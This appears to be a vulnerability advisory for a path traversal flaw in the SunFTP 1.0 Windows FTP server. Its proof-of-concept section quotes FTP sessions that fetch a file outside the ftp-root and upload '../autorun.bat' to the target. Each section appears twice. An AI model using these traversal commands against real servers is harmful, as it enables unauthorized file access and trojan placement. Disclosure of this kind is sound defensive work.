SunFTP Unauthorized File Access Vulnerability
BID:2428
Info
SunFTP Unauthorized File Access Vulnerability
| Bugtraq ID: | 2428 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Mar 02 2001 12:00AM |
| Updated: | Mar 02 2001 12:00AM |
| Credit: | Posted to Bugtraq by <[email protected]> on March 2, 2001. |
| Vulnerable: |
Rasmus J.P. Allenheim SunFTP 1.0 Build 9 |
| Not Vulnerable: | |
Discussion
SunFTP Unauthorized File Access Vulnerability
SunFTP is a freeware ftp server written by Rasmus J.P. Allenheim and associates for the Windows platform.
SunFTP contains a vulnerability that may allow ftp users to compromise the server. Users may be able to upload or retrieve files from outside the protected ftp-root directory.
This could allow, for example, users to place trojan horse programs on the system and gain control.
SunFTP is a freeware ftp server written by Rasmus J.P. Allenheim and associates for the Windows platform.
SunFTP contains a vulnerability that may allow ftp users to compromise the server. Users may be able to upload or retrieve files from outside the protected ftp-root directory.
This could allow, for example, users to place trojan horse programs on the system and gain control.
Exploit / POC
SunFTP Unauthorized File Access Vulnerability
The following is from the post to Bugtraq by <[email protected]>:
Using this vulnerability to retrieve a file from outside the ftp-root (sunftptest.txt):
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
Using this vulnerability to place a file on the target filesystem outside the ftp-root (../autorun.bat):
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
The following is from the post to Bugtraq by <[email protected]>:
Using this vulnerability to retrieve a file from outside the ftp-root (sunftptest.txt):
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
Using this vulnerability to place a file on the target filesystem outside the ftp-root (../autorun.bat):
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
Solution / Fix
SunFTP Unauthorized File Access Vulnerability
Solution:
This ftp server does not appear to be supported anymore. It is suggested that users upgrade to a supported ftp server.
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
This ftp server does not appear to be supported anymore. It is suggested that users upgrade to a supported ftp server.
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.